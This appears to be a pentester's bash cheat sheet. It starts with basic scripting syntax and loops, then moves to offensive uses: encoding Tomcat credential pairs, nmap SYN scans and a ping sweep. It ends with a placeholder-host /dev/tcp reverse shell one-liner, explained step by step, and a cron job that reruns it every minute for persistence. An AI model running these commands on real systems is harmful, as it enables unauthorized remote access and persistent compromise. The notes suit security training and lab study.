Bash

All your happy shiny bash scripts must start with a shebang:

#!/bin/bash

How-To: https://tldp.org/HOWTO/Bash-Prog-Intro-HOWTO-6.html

Basic Structure:

#!/bin/bash
if [ "foo" = "foo" ]; then
    echo expression evaluated as true
else 
    echo expression evaluated as false
fi

Example:

#!/bin/bash

echo "Enter username: "
read un

echo "Enter password: "
read pw

if [[ "$un" = "admin" && "$pw" = "superuser" ]]; then
    echo "Login Successful"
fi

NOTE: The == operator is non-standard

• Bash allows == to be used for equality with [, but this is not standard.
• See: Compare Strings in Bash
• Use either the first case wherein the quotes around $x are optional:

if [[ "$x" == "valid" ]]; then

• or use the second case:

if [ "$x" = "valid" ]; then

Run a command 5 times:

for i in {1..5}; do COMMAND-HERE; done           #does command 5 times
for (( c=1; c<=5; c++ )); do COMMAND-HERE; done  #same as above
for i in {0..10..2}; do COMMAND-HERE; done       #same but steps by 2

Or…

for((i=1;i<=10;i+=2)); do echo "Welcome $i times"; done

Work On Files:

# General
for i in *; do echo $i; done

# To encode multiple username:password combos in a text file to Base64
for cred in $(cat tomcat.txt); do echo -n $cred | base64; done

# Same as above, but appended to a text file
for cred in $(cat tomcat.txt); do echo -n $cred | base64 >> tomcat_base64.txt; done

# NOTE: The -n on the echo is necessary to NOT output the trailing newline character to the encoder

Or…

for i in /etc/*.conf; do cp $i /backup; done

My example iplist.txt:

for ip in $(cat iplist.txt); do nmap -sS -p 80 -T4 $ip; done

Or…

for ip in $(cat iplist.txt); do nmap -sS -p 80 -T4 $ip & done

Simple sweep of a network for a quick look at what machines are out there (and respond):

for i in {1..254}
do
    ping -w 5 -c 1 192.168.0.$i | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
done

wait # no args, wait until all background processes to finish

Note the “&” at the end. This will speed things up a lot.

/bin/bash -c 'bash -i &> /dev/tcp/[attack ip]/[port] 0>&1'

From the Bash manpage:

• -c string: commands are read from string.
• >& (same as &>) : redirect standard output (1) and standard error (2); i.e., 2>&1
  • This means: &> redirects the standard output (fd 1) and error (fd 2) to the socket opened to the IP specified which would be listening on the port specified.
• 0>&1 : redirect standard input (fd 0) to the same place as standard output (fd 1).
  • This would literally mean '0' (standard input) is attached to '1' (standard output).
  • Therefore, stdin (fd 0) is attached to stdout (fd 1) and (from the above: &> ) we know that the stdin for this bash process is available to the attacker listening on the port specified.

For persistence on a target: Include this one-liner in a crontab entry (i.e., a cronjob) that executes every minute of every day, etc.

echo "* * * * * /bin/bash -c 'bash -i &> /dev/tcp/[attack ip]/[port] 0>&1'" > gk_cron_job
crontab -i gk_cron_job
crontab -l              # list user's crontab and verify

Set up a listener on the attack machine (nc -nvlp [port#]) and it should connect within 1 minute.